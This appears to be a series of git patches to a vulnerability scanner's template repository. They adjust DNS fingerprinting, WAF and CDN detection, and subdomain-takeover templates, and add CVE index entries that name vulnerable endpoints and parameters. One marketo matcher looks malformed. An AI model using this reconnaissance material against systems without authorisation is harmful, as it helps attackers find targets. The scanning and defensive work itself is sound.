--- a/dns/dns-saas-service-detection.yaml
+++ b/dns/dns-saas-service-detection.yaml
@@ -25,12 +25,14 @@ dns:
     matchers-condition: or
     matchers:
       - type: word
+        part: answer
         name: ms-office
         words:
           - outlook.com
           - office.com
 
       - type: word
+        part: answer
         name: azure
         words:
           - "azure-api.net"
@@ -56,23 +58,26 @@ dns:
           - "trafficmanager.net"
 
       - type: word
+        part: answer
         name: zendesk
         words:
           - "zendesk.com"
 
       - type: word
+        part: answer
         name: announcekit
         words:
           - "cname.announcekit.app"
 
       - type: word
+        part: answer
         name: wix
         words:
           - "wixdns.net"
 
       - type: word
+        part: answer
         name: akamai-cdn
-        condition: or
         words:
           - akadns.net
           - akagtm.org
@@ -96,6 +101,7 @@ dns:
           - edgesuite.net
 
       - type: word
+        part: answer
         name: cloudflare-cdn
         words:
           - cloudflare.net
@@ -117,11 +123,13 @@ dns:
           - sn-cloudflare.com
 
       - type: word
+        part: answer
         name: amazon-cloudfront
         words:
           - cloudfront.net
 
       - type: word
+        part: answer
         name: salesforce
         words:
           - salesforce.com
@@ -129,6 +137,7 @@ dns:
           - force.com
 
       - type: word
+        part: answer
         name: amazon-aws
         words:
           - amazonaws.com
@@ -136,11 +145,13 @@ dns:
           - awsglobalaccelerator.com
 
       - type: word
+        part: answer
         name: fastly-cdn
         words:
           - fastly.net
 
       - type: word
+        part: answer
         name: netlify
         words:
           - netlify.app
@@ -148,22 +159,26 @@ dns:
           - netlifyglobalcdn.com
 
       - type: word
+        part: answer
         name: vercel
         words:
           - vercel.app
 
       - type: word
+        part: answer
         name: sendgrid
         words:
           - sendgrid.net
           - sendgrid.com
 
       - type: word
+        part: answer
         name: qualtrics
         words:
           - qualtrics.com
 
       - type: word
+        part: answer
         name: heroku
         words:
           - herokuapp.com
@@ -173,44 +188,52 @@ dns:
           - herokuspace.com
 
       - type: word
+        part: answer
         name: gitlab
         words:
           - gitlab.com
           - gitlab.io
 
       - type: word
+        part: answer
         name: perforce-akana
         words:
           - akana.com
           - apiportal.akana.com
 
       - type: word
+        part: answer
         name: skilljar
         words:
           - skilljarapp.com
 
       - type: word
+        part: answer
         name: datagrail
         words:
           - datagrail.io
 
       - type: word
+        part: answer
         name: platform.sh
         words:
           - platform.sh
 
       - type: word
+        part: answer
         name: folloze
         words:
           - folloze.com
 
       - type: word
+        part: answer
         name: pendo-receptive
         words:
           - receptive.io
           - pendo.io
 
       - type: word
+        part: answer
         name: discourse
         words:
           - bydiscourse.com
@@ -220,6 +243,7 @@ dns:
           - hosted-by-discourse.com
 
       - type: word
+        part: answer
         name: adobe-marketo
         words:
           - marketo.com
@@ -228,16 +252,19 @@ dns:
           - mktossl.com
           - mktoweb.com
 
-      - type: regex
+      - type: word
+        part: answer
         name: adobe-marketo
           - 'mkto-.{5,8}\.com'
 
       - type: word
+        part: answer
         name: adobe-marketo
         words:
           - marketo.com
 
       - type: word
+        part: answer
         name: rock-content
         words:
           - postclickmarketing.com
@@ -245,21 +272,25 @@ dns:
           - rockstage.io
 
       - type: word
+        part: answer
         name: rocketlane
         words:
           - rocketlane.com
 
       - type: word
+        part: answer
         name: webflow
         words:
           - proxy-ssl.webflow.com
 
       - type: word
+        part: answer
         name: stacker-hq
         words:
           - stacker.app
 
       - type: word
+        part: answer
         name: hubspot
         words:
           - hs-analytics.net
@@ -285,12 +316,14 @@ dns:
           - usemessages.com
 
       - type: word
+        part: answer
         name: gitbook
         words:
           - gitbook.com
           - gitbook.io
 
       - type: word
+        part: answer
         name: google-firebase
         words:
           - fcm.googleapis.com
@@ -311,6 +344,7 @@ dns:
           - firebaseremoteconfig.googleapis.com
 
       - type: word
+        part: answer
         name: zendesk
         words:
           - zdassets.com
@@ -319,12 +353,14 @@ dns:
           - zopim.com
 
       - type: word
+        part: answer
         name: imperva
         words:
           - incapdns.net
           - incapsula.com
 
       - type: word
+        part: answer
         name: proofpoint
         words:
           - infoprtct.com
@@ -334,6 +370,7 @@ dns:
           - proofpoint.com
 
       - type: word
+        part: answer
         name: q4-investor-relations
         words:
           - q4inc.com
@@ -341,6 +378,7 @@ dns:
           - q4web.com
 
       - type: word
+        part: answer
         name: google-hosted
         words:
           - appspot.com
@@ -354,11 +392,13 @@ dns:
           - run.app
 
       - type: word
+        part: answer
         name: wp-engine
         words:
           - wpengine.com
 
       - type: word
+        part: answer
         name: github
         words:
           - github.com
@@ -366,26 +406,31 @@ dns:
           - githubusercontent.com
 
       - type: word
+        part: answer
         name: ghost
         words:
           - ghost.io
 
       - type: word
+        part: answer
         name: digital-ocean
         words:
           - ondigitalocean.app
 
       - type: word
+        part: answer
         name: typedream
         words:
           - ontypedream.com
 
       - type: word
+        part: answer
         name: oracle-eloqua-marketing
         words:
           - hs.eloqua.com
 
       - type: regex
+        part: answer
         regex:
-          - "IN\tCNAME"
-          - "IN\\s*CNAME"
+          - "IN\tCNAME\\t(.+)$"
+          - "IN\\s*CNAME\\t(.+)$"
diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml
index 02c447486f..710ca1d46e 100644
--- a/dns/dns-waf-detect.yaml
+++ b/dns/dns-waf-detect.yaml
@@ -20,54 +20,64 @@ dns:
 
     matchers:
       - type: word
+        part: answer
         name: sanfor-shield
         words:
           - ".sangfordns.com"
 
       - type: word
+        part: answer
         name: 360panyun
         words:
           - ".360panyun.com"
 
       - type: word
+        part: answer
         name: baiduyun
         words:
           - ".yunjiasu-cdn.net"
 
       - type: word
+        part: answer
         name: chuangyudun
         words:
           - ".365cyd.cn"
           - ".cyudun.net"
 
       - type: word
+        part: answer
         name: knownsec
         words:
           - ".jiashule.com"
           - ".jiasule.org"
 
       - type: word
+        part: answer
         name: huaweicloud
         words:
           - ".huaweicloudwaf.com"
 
       - type: word
+        part: answer
         name: xinliuyun
         words:
           - ".ngaagslb.cn"
 
       - type: word
+        part: answer
         name: chinacache
         words:
           - ".chinacache.net"
           - ".ccgslb.net"
 
       - type: word
+        part: answer
         name: nscloudwaf
         words:
           - ".nscloudwaf.com"
 
       - type: word
+        part: answer
         name: wangsu
         words:
           - ".wsssec.com"
@@ -85,17 +95,20 @@ dns:
           - ".mwcloudcdn.com"
 
       - type: word
+        part: answer
         name: qianxin
         words:
           - ".360safedns.com"
           - ".360cloudwaf.com"
 
       - type: word
+        part: answer
         name: baiduyunjiasu
         words:
           - ".yunjiasu-cdn.net"
 
       - type: word
+        part: answer
         name: anquanbao
         words:
           - ".anquanbao.net"
@@ -114,58 +127,69 @@ dns:
           - '\.aliyundunwaf\.com'
 
       - type: word
+        part: answer
         name: xuanwudun
         words:
           - ".saaswaf.com"
           - ".dbappwaf.cn"
 
       - type: word
+        part: answer
         name: yundun
         words:
           - ".hwwsdns.cn"
           - ".yunduncname.com"
 
       - type: word
+        part: answer
         name: knownsec-ns
         words:
           - ".jiasule.net"
 
       - type: word
+        part: answer
         name: chuangyudun
         words:
           - ".365cyd.net"
 
       - type: word
+        part: answer
         name: qianxin
         words:
           - ".360wzb.com"
 
       - type: word
+        part: answer
         name: anquanbao
         words:
           - ".anquanbao.com"
 
       - type: word
+        part: answer
         name: wangsu
         words:
           - ".chinanetcenter.com"
 
       - type: word
+        part: answer
         name: baiduyunjiasue
         words:
           - ".ns.yunjiasu.com"
 
       - type: word
+        part: answer
         name: chinacache
         words:
           - ".chinacache.com"
 
       - type: word
+        part: answer
         name: cloudflare
         words:
           - "ns.cloudflare.com"
 
       - type: word
+        part: answer
         name: edns
         words:
           - ".iidns.com"
\ No newline at end of file
diff --git a/dns/dnssec-detection.yaml b/dns/dnssec-detection.yaml
index f9007a6eb5..9c85f26c5c 100644
--- a/dns/dnssec-detection.yaml
+++ b/dns/dnssec-detection.yaml
@@ -20,5 +20,6 @@ dns:
 
     matchers:
       - type: regex
+        part: answer
         regex:
-          - "IN\tDS\t(.+)"
\ No newline at end of file
+          - "IN\tDS\\t(.+)$"
\ No newline at end of file
diff --git a/dns/elasticbeanstalk-takeover.yaml b/dns/elasticbeanstalk-takeover.yaml
index 3e4af216b6..336a08f87e 100644
--- a/dns/elasticbeanstalk-takeover.yaml
+++ b/dns/elasticbeanstalk-takeover.yaml
@@ -42,7 +42,6 @@ dns:
           - NXDOMAIN
 
     extractors:
-      - type: regex
-        group: 1
-        regex:
-          - "IN\tCNAME\t(.+)"
+      - type: dsl
+        dsl:
+          - cname
diff --git a/dns/mx-fingerprint.yaml b/dns/mx-fingerprint.yaml
index 24808c1e14..a207076ae0 100644
--- a/dns/mx-fingerprint.yaml
+++ b/dns/mx-fingerprint.yaml
@@ -19,9 +19,10 @@ dns:
     type: MX
 
     matchers:
-      - type: word
-        words:
-          - "IN\tMX"
+      - type: regex
+        part: answer
+        regex:
+          - "IN\tMX\\t(.+)$"
 
     extractors:
       - type: regex
diff --git a/dns/nameserver-fingerprint.yaml b/dns/nameserver-fingerprint.yaml
index d08362e0bd..01884975e3 100644
--- a/dns/nameserver-fingerprint.yaml
+++ b/dns/nameserver-fingerprint.yaml
@@ -16,9 +16,10 @@ dns:
     type: NS
 
     matchers:
-      - type: word
-        words:
-          - "IN\tNS"
+      - type: regex
+        part: answer
+        regex:
+          - "IN\tNS\\t(.+)$"
 
     extractors:
       - type: regex
diff --git a/dns/ptr-fingerprint.yaml b/dns/ptr-fingerprint.yaml
index 0861364501..e562d62f1e 100644
--- a/dns/ptr-fingerprint.yaml
+++ b/dns/ptr-fingerprint.yaml
@@ -16,12 +16,12 @@ dns:
     type: PTR
 
     matchers:
-      - type: word
-        words:
-          - "IN\tPTR"
+      - type: regex
+        part: answer
+        regex:
+          - "IN\tPTR\\t(.+)$"
 
     extractors:
-      - type: regex
-        group: 1
-        regex:
-          - "IN\tPTR\t(.+)"
\ No newline at end of file
+      - type: dsl
+        dsl:
+          - ptr
\ No newline at end of file
diff --git a/dns/txt-fingerprint.yaml b/dns/txt-fingerprint.yaml
index 02e5f12700..382e3e5f61 100644
--- a/dns/txt-fingerprint.yaml
+++ b/dns/txt-fingerprint.yaml
@@ -18,9 +18,10 @@ dns:
     type: TXT
 
     matchers:
-      - type: word
-        words:
-          - "IN\tTXT"
+      - type: regex
+        part: answer
+        regex:
+          - "IN\tTXT\\t(.+)$"
 
     extractors:
       - type: regex

From b20a9f11242c02baf975a1e8d62e9da1ea0cedc1 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 29 Sep 2023 20:46:48 +0530
Subject: [PATCH 0614/1090] misc fixes

---
 dns/ptr-fingerprint.yaml | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/dns/ptr-fingerprint.yaml b/dns/ptr-fingerprint.yaml
index e562d62f1e..6de1477943 100644
--- a/dns/ptr-fingerprint.yaml
+++ b/dns/ptr-fingerprint.yaml
@@ -22,6 +22,7 @@ dns:
           - "IN\tPTR\\t(.+)$"
 
     extractors:
-      - type: dsl
-        dsl:
-          - ptr
\ No newline at end of file
+      - type: regex
+        group: 1
+        regex:
+          - "IN\tPTR\t(.+)"
\ No newline at end of file

From 38c649fcd3ee2b38d78e9509ed2a050d86b82bf0 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 16:34:05 +0000
Subject: [PATCH 0615/1090] Auto Generated New Template Addition List [Fri Sep
 29 16:34:05 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index d22191f106..6e508125f5 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,6 +1,7 @@
 http/cves/2014/CVE-2014-9180.yaml
 http/cves/2023/CVE-2023-2479.yaml
 http/cves/2023/CVE-2023-2766.yaml
+http/cves/2023/CVE-2023-29357.yaml
 http/cves/2023/CVE-2023-36845.yaml
 http/cves/2023/CVE-2023-42442.yaml
 http/cves/2023/CVE-2023-42793.yaml

From 6317b5f94f455e2154fd831d21ce2aef0eb05b05 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 16:34:19 +0000
Subject: [PATCH 0616/1090] Auto Generated Templates Checksum [Fri Sep 29
 16:34:19 UTC 2023] :robot:

---
 templates-checksum.txt | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index af38c0329d..72f5ff368c 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2579,6 +2579,7 @@ http/cves/2023/CVE-2023-28665.yaml:7e882463578f1064010b1a98a93dd9110af0487d
 http/cves/2023/CVE-2023-29084.yaml:6f2dfdc112ae56cd56af80f911aaa1511834c41a
 http/cves/2023/CVE-2023-29298.yaml:2ec1784eaff977f3afe47412157ca1a3ca02bc39
 http/cves/2023/CVE-2023-29300.yaml:82c28286cc116a0534b451abdef056f63cea992f
+http/cves/2023/CVE-2023-29357.yaml:c3f6492660d354cd24f0f48dbe04840b12d38904
 http/cves/2023/CVE-2023-29489.yaml:49db4760ca423c748c9b1d39857577d4bee7a416
 http/cves/2023/CVE-2023-29622.yaml:258377fe66918a871bddfa4fc941969e2d02c8b1
 http/cves/2023/CVE-2023-29623.yaml:989c59b734f662126def59dc6422e457be74ad9b
@@ -7085,7 +7086,7 @@ network/default-login/ldap-anonymous-login.yaml:de040a46cb1ed8184db1ff0f88d03eb2
 network/detection/activemq-openwire-transport-detect.yaml:0dc9e5e360bd3b2e2a919f62e489e924ae8b82d3
 network/detection/apache-activemq-detect.yaml:121abc64adbf17327bc23a8431f3b5e08f510dfe
 network/detection/axigen-mail-server-detect.yaml:c7e5b22d9b36cb6bb48b9347aa8eec265b7214a0
-network/detection/bgp-detect.yaml:b9df7b968dc8a59fe94e3ef66ca1b24b543a5465
+network/detection/bgp-detect.yaml:b4a78ac435a2d08be2fde2d66b39e044cb394931
 network/detection/cisco-finger-detect.yaml:770b049aa09f72d15c6bd23a04899a330eb4a256
 network/detection/clamav-detect.yaml:09433cdc329da80ee710a7e5893d8ee2cad9eb73
 network/detection/cql-native-transport.yaml:73ac12a1c9eff62746d27dccd4e776573175bf2e
@@ -7203,7 +7204,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:ab60010e2a49eac2b68f6fd7f1916339434622c8
+templates-checksum.txt:ec3061826c60ef1ee3caaf7393298512b65849b8
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 07d402ceb11e59d33d15292ee8140e1c7a8427c1 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 16:59:32 +0000
Subject: [PATCH 0617/1090] Auto Generated cves.json [Fri Sep 29 16:59:32 UTC
 2023] :robot:

---
 cves.json              | 2 ++
 cves.json-checksum.txt | 2 +-
 2 files changed, 3 insertions(+), 1 deletion(-)

diff --git a/cves.json b/cves.json
index 3b37efed3a..598eac4a86 100644
--- a/cves.json
+++ b/cves.json
@@ -246,6 +246,7 @@
 {"ID":"CVE-2014-8799","Info":{"Name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-8799.yaml"}
 {"ID":"CVE-2014-9094","Info":{"Name":"WordPress DZS-VideoGallery Plugin Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-9094.yaml"}
 {"ID":"CVE-2014-9119","Info":{"Name":"WordPress DB Backup \u003c=4.5 - Local File Inclusion","Severity":"medium","Description":"WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-9119.yaml"}
+{"ID":"CVE-2014-9180","Info":{"Name":"Eleanor CMS - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in go.php in Eleanor CMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the QUERY_STRING.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-9180.yaml"}
 {"ID":"CVE-2014-9444","Info":{"Name":"Frontend Uploader \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-9444.yaml"}
 {"ID":"CVE-2014-9606","Info":{"Name":"Netsweeper 4.0.8 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-9606.yaml"}
 {"ID":"CVE-2014-9607","Info":{"Name":"Netsweeper 4.0.4 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-9607.yaml"}
@@ -1953,6 +1954,7 @@
 {"ID":"CVE-2023-29084","Info":{"Name":"ManageEngine ADManager Plus - Command Injection","Severity":"high","Description":"Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-29084.yaml"}
 {"ID":"CVE-2023-29298","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29298.yaml"}
 {"ID":"CVE-2023-29300","Info":{"Name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","Severity":"critical","Description":"Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29300.yaml"}
+{"ID":"CVE-2023-29357","Info":{"Name":"Microsoft SharePoint - Authentication Bypass","Severity":"critical","Description":"Microsoft SharePoint Server Elevation of Privilege Vulnerability\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29357.yaml"}
 {"ID":"CVE-2023-29489","Info":{"Name":"cPanel - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29489.yaml"}
 {"ID":"CVE-2023-29622","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29622.yaml"}
 {"ID":"CVE-2023-29623","Info":{"Name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29623.yaml"}
diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt
index 56e6bbb8f2..b71cb18692 100644
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@@ -1 +1 @@
-5a85d5352421da476ffa2611a57b717f
+cf00d3e1c6a26a5c5e737e17baa8955c

From 7d97ff2b778e35e50ce5b1a476af5b7eda28d38f Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Sat, 30 Sep 2023 06:05:33 +0530
Subject: [PATCH 0618/1090] Update and rename google-bucket.yaml to
 google-storage-bucket.yaml

---
 .../android/{google-bucket.yaml => google-storage-bucket.yaml} | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)
 rename file/android/{google-bucket.yaml => google-storage-bucket.yaml} (74%)

diff --git a/file/android/google-bucket.yaml b/file/android/google-storage-bucket.yaml
similarity index 74%
rename from file/android/google-bucket.yaml
rename to file/android/google-storage-bucket.yaml
index 3dd2d6d483..0b17ae30ee 100644
--- a/file/android/google-bucket.yaml
+++ b/file/android/google-storage-bucket.yaml
@@ -1,7 +1,7 @@
 id: google-storage-bucket
 
 info:
-  name: Detect Mobile apps using Google storage Bucket 
+  name: Google Storage Bucket - Detection
   author: Thabisocn
   severity: info
 
@@ -13,4 +13,3 @@ file:
       - type: regex
         regex:
           - "[a-z0-9.-]+\\.appspot\\.com"
-          

From cb0cb3ea0a5ae7a7c629d073368e95684eb69726 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Sat, 30 Sep 2023 06:10:31 +0530
Subject: [PATCH 0619/1090] metadata update

---
 file/android/google-storage-bucket.yaml | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/file/android/google-storage-bucket.yaml b/file/android/google-storage-bucket.yaml
index 0b17ae30ee..95d3d860f3 100644
--- a/file/android/google-storage-bucket.yaml
+++ b/file/android/google-storage-bucket.yaml
@@ -4,6 +4,10 @@ info:
   name: Google Storage Bucket - Detection
   author: Thabisocn
   severity: info
+  metadata:
+    github-query: "/[a-z0-9.-]+\\.appspot\\.com/"
+    verified: "true"
+  tags: file,android,google
 
 file:
   - extensions:

From f10d3a0aa574072e86aaf56dd938f04ce678a44d Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sat, 30 Sep 2023 04:02:07 +0000
Subject: [PATCH 0620/1090] Auto WordPress Plugins Update [Sat Sep 30 04:02:07
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/newsletter.txt                       | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml           | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml            | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml     | 1 -
 .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml               | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml        | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml   | 1 -
 .../wordpress/plugins/all-in-one-wp-migration.yaml             | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 -
 http/technologies/wordpress/plugins/amp.yaml                   | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml          | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml         | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml           | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml              | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml    | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml         | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml      | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml   | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml            | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml        | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml       | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml          | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                  | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml              | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml         | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml           | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml        | 1 -
 .../wordpress/plugins/contact-form-7-honeypot.yaml             | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml        | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml    | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml       | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml         | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml    | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml   | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml         | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml   | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml      | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml     | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml        | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml        | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml            | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml     | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml         | 1 -
 .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml          | 1 -
 http/technologies/wordpress/plugins/elementor.yaml             | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml      | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml       | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml  | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml     | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml     | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml              | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml            | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml          | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml         | 1 -
 http/technologies/wordpress/plugins/formidable.yaml            | 3 +--
 http/technologies/wordpress/plugins/forminator.yaml            | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml   | 1 -
 .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml   | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml      | 1 -
 .../wordpress/plugins/google-listings-and-ads.yaml             | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml       | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml            | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml            | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml             | 1 -
 .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml          | 1 -
 .../wordpress/plugins/header-footer-elementor.yaml             | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml         | 1 -
 http/technologies/wordpress/plugins/health-check.yaml          | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml           | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml   | 1 -
 http/technologies/wordpress/plugins/imagify.yaml               | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml              | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml          | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml        | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml         | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml            | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml         | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml               | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml        | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                 | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml       | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml  | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml        | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml             | 1 -
